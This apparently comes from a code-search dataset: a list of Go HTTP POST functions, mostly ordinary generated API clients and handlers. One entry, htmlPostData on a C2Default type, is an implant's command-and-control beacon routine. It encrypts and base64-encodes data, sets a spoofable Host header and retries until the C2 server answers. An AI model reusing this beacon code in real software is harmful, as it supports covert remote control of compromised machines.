err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\n\t\tif localVarHttpResponse.StatusCode == 403 {\n\t\t\tvar v ProblemDetails\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\n\t\tif localVarHttpResponse.StatusCode == 404 {\n\t\t\tvar v ProblemDetails\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\n\t\tif localVarHttpResponse.StatusCode == 406 {\n\t\t\tvar v ProblemDetails\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\n\t\tif localVarHttpResponse.StatusCode == 415 {\n\t\t\tvar v ProblemDetails\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\n\t\tif localVarHttpResponse.StatusCode == 422 {\n\t\t\tvar v ProblemDetails\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\n\t\tif localVarHttpResponse.StatusCode == 429 {\n\t\t\tvar v ProblemDetails\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\n\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHttpResponse, nil\n}", "func deliverForPostType(postback Pbo) {\n\trequestBody, _ := json.Marshal(postback.Data)\n\tv_trace.Println(\"requestBody: \" + string(requestBody))\n\trequest, err := http.NewRequest(\"POST\", postback.Url, bytes.NewBuffer(requestBody))\n\trequest.Header.Set(\"Content-Type\", \"application/json\")\n\tclient := &http.Client{}\n\tv_trace.Println(\"request: \" + fmt.Sprint(request))\n\tv_info.Println(\"Delivering URL: < \" + postback.Url + \" > method: \" + postback.Method)\n\tresponse, err := client.Do(request)\n\tif err != nil {\n\t\tv_warning.Println(\"Could not send POST request to: <\" + postback.Url + \">\")\n\t} else {\n\t\tdefer response.Body.Close()\n\t\tlogEndpointResponse(response, postback)\n\t}\n}", "func (client HTTPSuccessClient) Post201Responder(resp *http.Response) (result autorest.Response, err error) { \n err = autorest.Respond(\n resp,\n client.ByInspecting(),\n azure.WithErrorUnlessStatusCode(http.StatusOK,http.StatusCreated),\n autorest.ByClosing())\n result.Response = resp\n return\n}", "func (me *SALESORDER_IMPL) CreateCancelOrderWebService (\n request *models_pkg.CancelRequest) (*models_pkg.CancelResponse, error) {\n //the endpoint path uri\n _pathUrl := \"/call/cancelOrder\"\n\n //variable to hold errors\n var err error = nil\n //the base uri for api requests\n _queryBuilder := configuration_pkg.GetBaseURI(configuration_pkg.ENUM_DEFAULT,me.config);\n\n //prepare query string for API call\n _queryBuilder = _queryBuilder + _pathUrl\n\n //validate and preprocess url\n _queryBuilder, err = apihelper_pkg.CleanUrl(_queryBuilder)\n if err != nil {\n //error in url validation or cleaning\n return nil, err\n }\n //prepare headers for the outgoing request\n headers := map[string]interface{} {\n \"user-agent\" : \"APIMATIC 2.0\",\n \"accept\" : \"application/json\",\n \"content-type\" : \"application/json; charset=utf-8\",\n }\n\n //prepare API request\n _request := unirest.Post(_queryBuilder, headers, request)\n //and invoke the API call request to fetch the response\n _response, err := unirest.AsString(_request,false);\n if err != nil {\n //error in API invocation\n return nil, err\n }\n\n //error handling using HTTP status codes\n if (_response.Code == 0) {\n err = apihelper_pkg.NewAPIError(\"Unexpected error\", _response.Code, _response.RawBody)\n } else if (_response.Code < 200) || (_response.Code > 206) { //[200,206] = HTTP OK\n err = apihelper_pkg.NewAPIError(\"HTTP Response Not OK\", _response.Code, _response.RawBody)\n }\n if(err != nil) {\n //error detected in status code validation\n return nil, err\n }\n\n //returning the response\n var retVal *models_pkg.CancelResponse = &models_pkg.CancelResponse{}\n err = json.Unmarshal(_response.RawBody, &retVal)\n\n if err != nil {\n //error in parsing\n return nil, err\n }\n return retVal, nil\n\n}", "func CorporateCreateTicketEncodeResponse(ctx context.Context, w http.ResponseWriter, response interface{}) error {\n\tvar body []byte\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\tw.Header().Set(\"Access-Control-Allow-Headers\", \"Content-Type,Authorization\")\n\tbody, err := json.Marshal(&response)\n\tlogger.Logf(\"CorporateCreateTicketEncodeResponse : %s\", string(body[:]))\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t//w.Header().Set(\"X-Checksum\", cm.Cksum(body))\n\n\tvar e = response.(dt.CorporateCreateTicketJSONResponse).ResponseCode\n\n\tif e <= dt.HeaderStatusOk {\n\t\tw.WriteHeader(http.StatusOK)\n\t} else if e <= dt.StatusBadRequest {\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t} else if e <= 998 {\n\t\tw.WriteHeader(http.StatusUnauthorized)\n\t} else {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t}\n\n\t_, err = w.Write(body)\n\n\treturn err\n}", "func (c *C2Default) htmlPostData(urlEnding string, sendData []byte) []byte {\n\turl := fmt.Sprintf(\"%s%s\", c.BaseURL, urlEnding)\n\t//log.Println(\"Sending POST request to url: \", url)\n\t// If the AesPSK is set, encrypt the data we send\n\tif len(c.Key) != 0 {\n\t\t//log.Printf(\"Encrypting Post data\")\n\t\tsendData = c.encryptMessage(sendData)\n\t}\n\tsendData = append([]byte(c.ApfellID), sendData...) // Prepend the UUID\n\tsendData = []byte(base64.StdEncoding.EncodeToString(sendData)) // Base64 encode and convert to raw bytes\n\treq, err := http.NewRequest(\"POST\", url, bytes.NewBuffer(sendData))\n\tif err != nil {\n\t\t//log.Printf(\"Error creating new http request: %s\", err.Error())\n\t\treturn make([]byte, 0)\n\t}\n\tcontentLength := len(sendData)\n\treq.ContentLength = int64(contentLength)\n\treq.Header.Set(\"User-Agent\", c.UserAgent)\n\t// Set the host header if not empty\n\tif len(c.HostHeader) > 0 {\n\t\t//req.Header.Set(\"Host\", c.HostHeader)\n\t\treq.Host = c.HostHeader\n\t}\n\t// loop here until we can get our data to go through properly\n\tfor true {\n\t\tclient := &http.Client{\n\t\t\tTimeout: 30 * time.Second,\n\t\t}\n\t\tresp, err := client.Do(req)\n\t\tif err != nil {\n\t\t\t//time.Sleep(time.Duration(c.SleepInterval()) * time.Second)\n\t\t\ttime.Sleep(time.Duration(c.getSleepTime()) * time.Second)\n\t\t\tcontinue\n\t\t}\n\n\t\tif resp.StatusCode != 200 {\n\t\t\ttime.Sleep(time.Duration(c.getSleepTime()) * time.Second)\n\t\t\t//time.Sleep(time.Duration(c.SleepInterval()) * time.Second)\n\t\t\tcontinue\n\t\t}\n\n\t\tdefer resp.Body.Close()\n\n\t\tbody, err := ioutil.ReadAll(resp.Body)\n\n\t\tif err != nil {\n\t\t\ttime.Sleep(time.Duration(c.getSleepTime()) * time.Second)\n\t\t\t//time.Sleep(time.Duration(c.SleepInterval()) * time.Second)\n\t\t\tcontinue\n\t\t}\n\n\t\traw, err := base64.StdEncoding.DecodeString(string(body))\n\t\tif err != nil {\n\t\t\t//log.Println(\"Error decoding base64 data: \", err.Error())\n\t\t\treturn make([]byte, 0)\n\t\t}\n\n\t\tif len(raw) == 0 {\n\t\t\ttime.Sleep(time.Duration(c.getSleepTime()) * time.Second)\n\t\t\tcontinue\n\t\t}\n\n\t\tenc_raw := raw[36:] // Remove the Payload UUID\n\t\t// if the AesPSK is set and we're not in the midst of the key exchange, decrypt the response\n\t\tif len(c.Key) != 0 {\n\t\t\t//log.Println(\"just did a post, and decrypting the message back\")\n\t\t\tenc_raw = c.decryptMessage(enc_raw)\n\t\t\t//log.Println(enc_raw)\n\t\t\tif len(enc_raw) == 0 {\n\t\t\t\t// failed somehow in decryption\n\t\t\t\t//time.Sleep(time.Duration(c.SleepInterval()) * time.Second)\n\t\t\t\ttime.Sleep(time.Duration(c.getSleepTime()) * time.Second)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t\t//log.Printf(\"Raw htmlpost response: %s\\n\", string(enc_raw))\n\t\treturn enc_raw\n\t}\n\treturn make([]byte, 0) //shouldn't get here\n}", "func (r apiCreateCouponsRequest) Execute() (InlineResponse2007, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodPost\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue InlineResponse2007\n\t)\n\n\tlocalBasePath, err := r.apiService.client.cfg.ServerURLWithContext(r.ctx, \"ManagementApiService.CreateCoupons\")\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, GenericOpenAPIError{error: err.Error()}\n\t}\n\n\tlocalVarPath := localBasePath + \"/v1/applications/{applicationId}/campaigns/{campaignId}/coupons\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"applicationId\"+\"}\", _neturl.QueryEscape(parameterToString(r.applicationId, \"\")), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"campaignId\"+\"}\", _neturl.QueryEscape(parameterToString(r.campaignId, \"\")), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif r.body == nil {\n\t\treturn localVarReturnValue, nil, reportError(\"body is required and must be specified\")\n\t}\n\n\tif r.silent != nil {\n\t\tlocalVarQueryParams.Add(\"silent\", parameterToString(*r.silent, \"\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{\"application/json\"}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\t// body params\n\tlocalVarPostBody = r.body\n\tif r.ctx != nil {\n\t\t// API Key Authentication\n\t\tif auth, ok := r.ctx.Value(ContextAPIKeys).(map[string]APIKey); ok {\n\t\t\tif auth, ok := auth[\"Authorization\"]; ok {\n\t\t\t\tvar key string\n\t\t\t\tif auth.Prefix != \"\" {\n\t\t\t\t\tkey = auth.Prefix + \" \" + auth.Key\n\t\t\t\t} else {\n\t\t\t\t\tkey = auth.Key\n\t\t\t\t}\n\t\t\t\tlocalVarHeaderParams[\"Authorization\"] = key\n\t\t\t}\n\t\t}\n\t}\n\tif r.ctx != nil {\n\t\t// API Key Authentication\n\t\tif auth, ok := r.ctx.Value(ContextAPIKeys).(map[string]APIKey); ok {\n\t\t\tif auth, ok := auth[\"Authorization\"]; ok {\n\t\t\t\tvar key string\n\t\t\t\tif auth.Prefix != \"\" {\n\t\t\t\t\tkey = auth.Prefix + \" \" + auth.Key\n\t\t\t\t} else {\n\t\t\t\t\tkey = auth.Key\n\t\t\t\t}\n\t\t\t\tlocalVarHeaderParams[\"Authorization\"] = key\n\t\t\t}\n\t\t}\n\t}\n\treq, err := r.apiService.client.prepareRequest(r.ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := r.apiService.client.callAPI(req)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v InlineResponse2007\n\t\t\terr = r.apiService.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = r.apiService.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func (c *B2) parseResponse(resp *http.Response, result interface{}, auth *authorizationState) error {\n\tdefer resp.Body.Close()\n\n\t// Read response body\n\tbody, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif c.Debug {\n\t\tlog.Printf(\"Response: %s\", body)\n\t}\n\n\t// Check response code\n\tswitch resp.StatusCode {\n\tcase 200: // Response is OK\n\tcase 401:\n\t\tauth.invalidate()\n\t\treturn &B2Error{\n\t\t\tCode: \"UNAUTHORIZED\",\n\t\t\tMessage: \"The account ID is wrong, the account does not have B2 enabled, or the application key is not valid\",\n\t\t\tStatus: resp.StatusCode,\n\t\t}\n\tdefault:\n\t\tif err := c.parseError(body); err != nil {\n\t\t\treturn err\n\t\t}\n\t\treturn &B2Error{\n\t\t\tCode: \"UNKNOWN\",\n\t\t\tMessage: \"Unrecognised status code\",\n\t\t\tStatus: resp.StatusCode,\n\t\t}\n\t}\n\n\treturn ffjson.Unmarshal(body, result)\n}", "func ParsePostInvoicesResponse(rsp *http.Response) (*PostInvoicesResponse, error) {\n\tbodyBytes, err := ioutil.ReadAll(rsp.Body)\n\tdefer rsp.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse := &PostInvoicesResponse{\n\t\tBody: bodyBytes,\n\t\tHTTPResponse: rsp,\n\t}\n\n\tswitch {\n\t}\n\n\treturn response, nil\n}", "func CreateBucket(w http.ResponseWriter, r *http.Request) *appError {\n decoder := json.NewDecoder(r.Body)\n var ecsBucket ECSBucket\n err := decoder.Decode(&ecsBucket)\n if err != nil {\n return &appError{err: err, status: http.StatusBadRequest, json: \"Can't decode JSON data\"}\n }\n headers := make(map[string][]string)\n if ecsBucket.ReplicationGroup != \"\" {\n headers[\"x-emc-vpool\"] = []string{ecsBucket.ReplicationGroup}\n }\n if ecsBucket.MetadataSearch != \"\" {\n headers[\"x-emc-metadata-search\"] = []string{ecsBucket.MetadataSearch}\n }\n if ecsBucket.EnableADO {\n headers[\"x-emc-is-stale-allowed\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-is-stale-allowed\"] = []string{\"false\"}\n }\n if ecsBucket.EnableFS {\n headers[\"x-emc-file-system-access-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-file-system-access-enabled\"] = []string{\"false\"}\n }\n if ecsBucket.EnableCompliance {\n headers[\"x-emc-compliance-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-compliance-enabled\"] = []string{\"false\"}\n }\n if ecsBucket.EnableEncryption {\n headers[\"x-emc-server-side-encryption-enabled\"] = []string{\"true\"}\n } else {\n headers[\"x-emc-server-side-encryption-enabled\"] = []string{\"false\"}\n }\n var bucketCreateResponse Response\n if ecsBucket.Api == \"s3\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = s3Request(s3, ecsBucket.Name, \"PUT\", \"/\", headers, \"\")\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n if bucketCreateResponse.Code == 200 {\n rendering.JSON(w, http.StatusOK, ecsBucket.Name)\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n } else if ecsBucket.Api == \"swift\" {\n bucketCreateResponse, err = swiftRequest(ecsBucket.Endpoint, ecsBucket.User, ecsBucket.Password, ecsBucket.Name, \"PUT\", \"/\", headers, \"\")\n log.Print(bucketCreateResponse)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n if bucketCreateResponse.Code >= 200 && bucketCreateResponse.Code < 300 {\n rendering.JSON(w, http.StatusOK, ecsBucket.Name)\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n } else if ecsBucket.Api == \"atmos\" {\n s3, err := getS3(r)\n if err != nil {\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n bucketCreateResponse, err = atmosRequest(ecsBucket.Endpoint, s3.AccessKey, s3.SecretKey, \"\", \"PUT\", \"/rest/subtenant\", headers, \"\")\n if err != nil {\n log.Print(err)\n return &appError{err: err, status: http.StatusInternalServerError, json: http.StatusText(http.StatusInternalServerError)}\n }\n if bucketCreateResponse.Code >= 200 && bucketCreateResponse.Code < 300 {\n rendering.JSON(w, http.StatusOK, bucketCreateResponse.ResponseHeaders[\"Subtenantid\"][0])\n } else {\n return &appError{err: err, status: http.StatusInternalServerError, xml: bucketCreateResponse.Body}\n }\n }\n\n return nil\n}", "func encodePostAcceptDealResponse(ctx context.Context, w http1.ResponseWriter, response interface{}) (err error) {\n\tw.Header().Set(\"Content-Type\", \"application/json; charset=utf-8\")\n\terr = json.NewEncoder(w).Encode(response)\n\treturn\n}", "func decodePostAcceptDealRequest(_ context.Context, r *http1.Request) (interface{}, error) {\n\treq := endpoint.PostAcceptDealRequest{}\n\terr := json.NewDecoder(r.Body).Decode(&req)\n\treturn req, err\n}", "func ToICAPEGResp(w icap.ResponseWriter, req *icap.Request) {\n\th := w.Header()\n\th.Set(\"ISTag\", utils.ISTag)\n\th.Set(\"Service\", \"Egirna ICAP-EG\")\n\n\tinfoLogger.LogfToFile(\"Request received---> METHOD:%s URL:%s\\n\", req.Method, req.RawURL)\n\n\tappCfg := config.App()\n\n\tswitch req.Method {\n\tcase utils.ICAPModeOptions:\n\n\t\t/* If any remote icap is enabled, the work flow is controlled by the remote icap */\n\t\tif strings.HasPrefix(appCfg.RespScannerVendor, utils.ICAPPrefix) {\n\t\t\tdoRemoteOPTIONS(req, w, appCfg.RespScannerVendor, appCfg.RespScannerVendorShadow, utils.ICAPModeResp)\n\t\t\treturn\n\t\t} else if strings.HasPrefix(appCfg.RespScannerVendorShadow, utils.ICAPPrefix) { // if the shadow wants to run independently\n\t\t\t//siSvc := service.GetICAPService(appCfg.RespScannerVendorShadow)\n\t\t\t//siSvc.SetHeader(req.Header)\n\t\t\t//updateEmptyOptionsEndpoint(siSvc, utils.ICAPModeResp)\n\t\t\t//go doShadowOPTIONS(siSvc)\n\t\t}\n\n\t\th.Set(\"Methods\", utils.ICAPModeResp)\n\t\th.Set(\"Allow\", \"204\")\n\t\tif pb, _ := strconv.Atoi(appCfg.PreviewBytes); pb > 0 {\n\t\t\th.Set(\"Preview\", appCfg.PreviewBytes)\n\t\t}\n\t\th.Set(\"Transfer-Preview\", utils.Any)\n\t\tw.WriteHeader(http.StatusOK, nil, false)\n\tcase utils.ICAPModeResp:\n\n\t\tdefer req.Response.Body.Close()\n\n\t\tif val, exist := req.Header[\"Allow\"]; !exist || (len(val) > 0 && val[0] != utils.NoModificationStatusCodeStr) { // following RFC3507, if the request has Allow: 204 header, it is to be checked and if it doesn't exists, return the request as it is to the ICAP client, https://tools.ietf.org/html/rfc3507#section-4.6\n\t\t\tdebugLogger.LogToFile(\"Processing not required for this request\")\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\t/* If any remote icap is enabled, the work flow is controlled by the remote icap */\n\t\tif strings.HasPrefix(appCfg.RespScannerVendor, utils.ICAPPrefix) {\n\t\t\tdoRemoteRESPMOD(req, w, appCfg.RespScannerVendor, appCfg.RespScannerVendorShadow)\n\t\t\treturn\n\t\t}\n\n\t\t/* If the shadow icap wants to run independently */\n\t\tif appCfg.RespScannerVendor == utils.NoVendor && strings.HasPrefix(appCfg.RespScannerVendorShadow, utils.ICAPPrefix) {\n\t\t\t//siSvc := service.GetICAPService(appCfg.RespScannerVendorShadow)\n\t\t\t//siSvc.SetHeader(req.Header)\n\t\t\t//shadowHTTPResp := utils.GetHTTPResponseCopy(req.Response)\n\t\t\t//go doShadowRESPMOD(siSvc, *req.Request, shadowHTTPResp)\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\tif appCfg.RespScannerVendor == utils.NoVendor && appCfg.RespScannerVendorShadow == utils.NoVendor { // if no scanner name provided, then bypass everything\n\t\t\tdebugLogger.LogToFile(\"No respmod scanner provided...bypassing everything\")\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\t// getting the content type to determine if the response is for a file, and if so, if its allowed to be processed\n\t\t// according to the configuration\n\n\t\tct := utils.GetMimeExtension(req.Preview)\n\n\t\tprocessExts := appCfg.ProcessExtensions\n\t\tbypassExts := appCfg.BypassExtensions\n\n\t\tif utils.InStringSlice(ct, bypassExts) { // if the extension is bypassable\n\t\t\tdebugLogger.LogToFile(\"Processing not required for file type-\", ct)\n\t\t\tdebugLogger.LogToFile(\"Reason: Belongs bypassable extensions\")\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\tif utils.InStringSlice(utils.Any, bypassExts) && !utils.InStringSlice(ct, processExts) { // if extension does not belong to \"All bypassable except the processable ones\" group\n\t\t\tdebugLogger.LogToFile(\"Processing not required for file type-\", ct)\n\t\t\tdebugLogger.LogToFile(\"Reason: Doesn't belong to processable extensions\")\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\t// copying the file to a buffer for scanner vendor processing as the file is allowed according the co figuration\n\n\t\tbuf := &bytes.Buffer{}\n\n\t\tif _, err := io.Copy(buf, req.Response.Body); err != nil {\n\t\t\terrorLogger.LogToFile(\"Failed to copy the response body to buffer: \", err.Error())\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\tif buf.Len() > appCfg.MaxFileSize {\n\t\t\tdebugLogger.LogToFile(\"File size too large\")\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\t// preparing the file meta informations\n\t\t// //filename := utils.GetFileName(req.Request)\n\t\t// //fileExt := utils.GetFileExtension(req.Request)\n\t/*\tfmi := dtos.FileMetaInfo{\n\t\t\tFileName: filename,\n\t\t\tFileType: fileExt,\n\t\t\tFileSize: float64(buf.Len()),\n\t\t}\n*/\n\t\t/* If the shadow virus scanner wants to run independently */\n\t\tif appCfg.RespScannerVendor == utils.NoVendor && appCfg.RespScannerVendorShadow != utils.NoVendor {\n\t\t//\tgo doShadowScan(filename, fmi, buf, \"\")\n\t\t\tw.WriteHeader(http.StatusNoContent, nil, false)\n\t\t\treturn\n\t\t}\n\n\t\t//status, sampleInfo := doScan(appCfg.RespScannerVendor, filename, fmi, buf, \"\") // scan the file for any anomalies\n/*\n\t\tif status == http.StatusOK && sampleInfo != nil {\n\t\t\tinfoLogger.LogfToFile(\"The file:%s is %s\\n\", filename, sampleInfo.SampleSeverity)\n\t\t\thtmlBuf, newResp := utils.GetTemplateBufferAndResponse(utils.BadFileTemplate, &dtos.TemplateData{\n\t\t\t\tFileName: sampleInfo.FileName,\n\t\t\t\tFileType: sampleInfo.SampleType,\n\t\t\t\tFileSizeStr: sampleInfo.FileSizeStr,\n\t\t\t\tRequestedURL: utils.BreakHTTPURL(req.Request.RequestURI),\n\t\t\t\tSeverity: sampleInfo.SampleSeverity,\n\t\t\t\tScore: sampleInfo.VTIScore,\n\t\t\t\tResultsBy: appCfg.RespScannerVendor,\n\t\t\t})\n\t\t\tw.WriteHeader(http.StatusOK, newResp, true)\n\t\t\tw.Write(htmlBuf.Bytes())\n\t\t\treturn\n\t\t}\n\n\t\tif status == http.StatusNoContent {\n\t\t\tinfoLogger.LogfToFile(\"The file %s is good to go\\n\", filename)\n\t\t}\n\t\t*/\n\t//\tw.WriteHeader(status, nil, false) // \\\n\n\tcase \"ERRDUMMY\":\n\t\tw.WriteHeader(http.StatusBadRequest, nil, false)\n\t\tdebugLogger.LogToFile(\"Malformed request\")\n\tdefault:\n\t\tw.WriteHeader(http.StatusMethodNotAllowed, nil, false)\n\t\tdebugLogger.LogfToFile(\"Invalid request method %s- respmod\\n\", req.Method)\n\t}\n}", "func encodeCreatePostResponse(ctx context.Context, w http.ResponseWriter, response interface{}) (err error) {\n\tif f, ok := response.(endpoint.Failure); ok && f.Failed() != nil {\n\t\tErrorEncoder(ctx, f.Failed(), w)\n\t\treturn nil\n\t}\n\tw.Header().Set(\"Content-Type\", \"application/json; charset=utf-8\")\n\terr = json.NewEncoder(w).Encode(response)\n\tif err != nil {\n\t\tlogrus.Warn(err.Error())\n\t}\n\treturn\n}", "func encodeUpdatePostResponse(ctx context.Context, w http.ResponseWriter, response interface{}) (err error) {\n\tif f, ok := response.(endpoint.Failure); ok && f.Failed() != nil {\n\t\tErrorEncoder(ctx, f.Failed(), w)\n\t\treturn nil\n\t}\n\tw.Header().Set(\"Content-Type\", \"application/json; charset=utf-8\")\n\terr = json.NewEncoder(w).Encode(response)\n\tif err != nil {\n\t\t\tlogrus.Warn(err.Error())\n\t\t}\n\treturn\n}", "func ParseCreateClinicResponse(rsp *http.Response) (*CreateClinicResponse, error) {\n\tbodyBytes, err := io.ReadAll(rsp.Body)\n\tdefer func() { _ = rsp.Body.Close() }()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse := &CreateClinicResponse{\n\t\tBody: bodyBytes,\n\t\tHTTPResponse: rsp,\n\t}\n\n\tswitch {\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 200:\n\t\tvar dest Clinic\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON200 = &dest\n\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"xml\") && rsp.StatusCode == 200:\n\t\tvar dest map[string]interface{}\n\t\tif err := xml.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.XML200 = &dest\n\n\t}\n\n\treturn response, nil\n}", "func (r apiUpdateCustomerProfilesV2Request) Execute() (MultipleCustomerProfileIntegrationResponseV2, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodPut\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue MultipleCustomerProfileIntegrationResponseV2\n\t)\n\n\tlocalBasePath, err := r.apiService.client.cfg.ServerURLWithContext(r.ctx, \"IntegrationApiService.UpdateCustomerProfilesV2\")\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, GenericOpenAPIError{error: err.Error()}\n\t}\n\n\tlocalVarPath := localBasePath + \"/v2/customer_profiles\"\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif r.body == nil 